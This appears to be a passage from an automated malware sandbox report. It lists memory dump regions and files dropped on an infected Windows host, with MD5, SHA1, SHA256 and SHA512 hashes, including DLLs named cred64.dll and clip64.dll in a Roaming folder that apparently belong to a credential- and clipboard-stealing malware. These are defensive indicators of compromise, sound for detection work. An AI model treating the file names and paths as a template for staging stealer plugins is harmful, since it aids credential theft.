memory/5512-603-0x0000000005870000-0x0000000005880000-memory.dmp

memory/5452-605-0x0000000000400000-0x0000000000409000-memory.dmp

memory/676-604-0x00000000023C0000-0x00000000023D6000-memory.dmp

memory/1860-609-0x00000000049D0000-0x00000000049E0000-memory.dmp

memory/5092-614-0x0000000000400000-0x000000000266D000-memory.dmp

memory/5320-615-0x00007FF706C00000-0x00007FF7071A1000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\TransportSecurity

MD5 2851a70ca19b16778e94b225dcc27904
SHA1 cea1968ef75b931ddd6e8af9256dcae12ff74870
SHA256 707f9ba4d77ef904b4343d5363dc2587dfe7bd9800c21006aad40d1e986647a0
SHA512 bd52bc9d20c6d23a889f2625de66299a0ed00052f29ec26a90e05dd24768802338f63205301b8305ca792c20bcd8c242c24ffd9d7580d7cf248214ec3a77fc30

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Code Cache\js\index-dir\the-real-index

MD5 61584b4ce26636c20cce4748f0b3ebe8
SHA1 4c92db3122013ee98b9ef74d80d4bf898594a65c
SHA256 cd6501470054de747bec19b698ff478be89abc245a7764844e6a926f53e0bd2a
SHA512 d4c379c4d772f7cc7860c03c3356ee3668fa7c636bbe455926908aebfb133b108c31df5579211b36a7c90bf47510d9c92e855c2956a8150a053c99cd1c868faf

memory/5092-638-0x0000000004190000-0x0000000004598000-memory.dmp

memory/5092-639-0x00000000046A0000-0x0000000004F8B000-memory.dmp

memory/5512-640-0x0000000073A70000-0x0000000074220000-memory.dmp

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\ef766753-938b-4602-a2a8-12855bc1709d.tmp

MD5 f119c59ab5b93e73ae39b69f5b8c8658
SHA1 b1cbdd2fdeef5b7bb03e1e3ae7241fb27441acba
SHA256 2dfa1c3dfb5ab557db79d5b97fa87a7f69a59ec6d1046633b233154d2a5bc91c
SHA512 6f1f285c4844a3640f3b221c1edc196cd4bb8c9868fae1d95c5531ca9be02fe148be13c0aa4064f793ae03f8cf6aa73941d84a886708ab3b2adb26f4d9367e43

C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Network Persistent State

MD5 98016b359d789dbc7817993933766999
SHA1 616fc323bc29b87c281235b738a045c75e32ea6c
SHA256 1373b412cc42cd0ed852d0b5f78b8242df547f6854107798d2427da790afba88
SHA512 96cdf65839633cdbb7aca2d99fce315f881727f94240333a042b0d79a4fe7125ef70ac9a41b36fd89557ea95424a30745a6b5f5f4f1fed54036f3ec8dbb7de47

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_4iwu044s.wwj.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\tmp70E8.tmp

MD5 02d2c46697e3714e49f46b680b9a6b83
SHA1 84f98b56d49f01e9b6b76a4e21accf64fd319140
SHA256 522cad95d3fa6ebb3274709b8d09bbb1ca37389d0a924cd29e934a75aa04c6c9
SHA512 60348a145bfc71b1e07cb35fa79ab5ff472a3d0a557741ea2d39b3772bc395b86e261bd616f65307ae0d997294e49b5548d32f11e86ef3e2704959ca63da8aac

C:\Users\Admin\AppData\Local\Temp\tmp710D.tmp

MD5 afa13f3defcd7a3454d106cf6abbf911
SHA1 c5bb2e376d265d252edbcea4252580c7f44ee741
SHA256 707fff65d2f00566f96afd5b2a0e1c0460367c4bc008e55b60739f046f46f2f0
SHA512 570a13afeaa7452cb43528aff19c09bbc528c6b29f065e847e966bfd2cd8dc3cdc0637935e6f9ebfdde8019e5135ab01a3a18667e0ed8623ef8b3366492a6203

C:\Users\Admin\AppData\Local\Temp\tmp7148.tmp

MD5 349e6eb110e34a08924d92f6b334801d
SHA1 bdfb289daff51890cc71697b6322aa4b35ec9169
SHA256 c9fd7be4579e4aa942e8c2b44ab10115fa6c2fe6afd0c584865413d9d53f3b2a
SHA512 2a635b815a5e117ea181ee79305ee1baf591459427acc5210d8c6c7e447be3513ead871c605eb3d32e4ab4111b2a335f26520d0ef8c1245a4af44e1faec44574

C:\Users\Admin\AppData\Local\Temp\tmp715D.tmp

MD5 89e12a4710470299e05679908b2b1f7a
SHA1 85b08579e6cf8518b085ea7709bd67ae6b3e0914
SHA256 1b89b37b7f154f7c1c9adba1f8f660fdcb1b0f4a4812207b450fbe5c251e6542
SHA512 670609ca82862c03208bc00b927e5f2ca0847572001a5cb6cdb9bb046abbcc0476cdf3b7df83c7e5f592301c4ca85e47ef3a7d32fe45552981d21d9a110794d3

C:\Users\Admin\AppData\Local\Temp\tmp716F.tmp

MD5 f70aa3fa04f0536280f872ad17973c3d
SHA1 50a7b889329a92de1b272d0ecf5fce87395d3123
SHA256 8d782aa65de6db3538a14da82216e96d5e0a3c60496726e3541a8165bccc65f8
SHA512 30675c5c610d9aa32a4c4a4d9c3af7570823cd197f8d2a709222c78e2cd15304bbed80e233e3674ec2f6e33d1961c67fd6a46dc8ba8b1a301cd0722932c03c84

C:\Users\Admin\AppData\Local\Temp\tmp719A.tmp

MD5 d367ddfda80fdcf578726bc3b0bc3e3c
SHA1 23fcd5e4e0e5e296bee7e5224a8404ecd92cf671
SHA256 0b8607fdf72f3e651a2a8b0ac7be171b4cb44909d76bb8d6c47393b8ea3d84a0
SHA512 40e9239e3f084b4b981431817ca282feb986cf49227911bf3d68845baf2ee626b564c8fabe6e13b97e6eb214da1c02ca09a62bcf5e837900160cf479c104bf77

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\cred64.dll

MD5 a5b509a3fb95cc3c8d89cd39fc2a30fb
SHA1 5aff4266a9c0f2af440f28aa865cebc5ddb9cd5c
SHA256 5f3c80056c7b1104c15d6fee49dac07e665c6ffd0795ad486803641ed619c529
SHA512 3cc58d989c461a04f29acbfe03ed05f970b3b3e97e6819962fc5c853f55bce7f7aba0544a712e3a45ee52ab31943c898f6b3684d755b590e3e961ae5ecd1edb9

C:\Users\Admin\AppData\Roaming\006700e5a2ab05\clip64.dll

MD5 e913b0d252d36f7c9b71268df4f634fb
SHA1 5ac70d8793712bcd8ede477071146bbb42d3f018
SHA256 4cf5b584cf79ac523f645807a65bc153fbeaa564c0e1acb4dac9004fc9d038da
SHA512 3ea08f0897c1b7b5859961351eef59840bbf319a6ad7ebe1c9e1b5e2ce25588d7b1a37fd6c5417653521fc73f1f42eb043d0ee6fcd645aa92b8f305d726273b4